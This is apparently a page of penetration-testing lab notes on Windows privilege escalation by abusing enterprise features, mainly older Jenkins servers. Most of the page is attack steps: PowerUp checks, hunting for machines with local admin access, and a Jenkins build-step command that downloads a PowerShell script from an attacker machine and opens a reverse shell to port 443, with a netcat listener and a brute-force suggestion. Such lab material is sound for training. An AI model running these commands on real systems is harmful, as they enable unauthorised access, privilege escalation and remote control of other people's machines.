5.1.1 - Feature Abuse

Feature Abuse

Some functionality of a web site, possibly even security features, may be abused to cause unexpected behavior.

On Windows, some enterprise applications need either Administrative privileges or SYSTEM privileges, making them a wonderful avenue for privilege escalation.

Others techniques are presente here here: Windows Privilege Escalation

Jenkins

An older version of Jenkins (before 2.x) is an example of vulnerable enterprise application.

This versions contains numerous plugins, and if you've Admin access, you can go to: http://<jenkins_server>/script and execute custom scripts via console.

Without Admin access is possible to add or edit build steps in the build configuration, eg. adding "Execute Windows Batch Command" and enter: powershell -c <command> that permits to download and execute scripts.

Example of usage

Exploit a service and elevate privileges to local administrator

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
powershell
. C:\AD\Tools\PowerUp.ps1
Invoke-AllChecks
#Evaluate services with "CanRestart: True" and "Check: Modifiable Services" or "Unquoted Service Paths"
#Utilize the AbuseFunction command indicated

Identify a machine in the domain where student has local administrative access

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
powershell
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose
#It display the machine in the domain where student has local admin access

Using privileges of a user on Jenkins <ip:8080>, get admin privileges

#This Jenkins vs has password policy without a restrictive rule, than can be potentially abused via brute force (Hydra)
#Go to <ip:8080> -> Dashboard -> Modify an existing project -> Configure -> Add build step (write the following command)->
powershell iex (iwr -UseBasicParsing http://<attacker_machine>/Invoke-PowershellTcp.ps1);power -Reverse -IPAddress <attacker_machine> -Port 443
#Execute Windows batch command -> Save
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 #On attacker machine go in listening mode on port 443
#Run HFS.exe if the connection is blocked
$env:username #Obtain user name
$env:computername
ls env: #Obtain USERDNSDOMAIN

Refers to Learning Object 5 lab

Previous5.1 - Privilege Escalation Next5.1.2 - Relaying

Last updated 7 months ago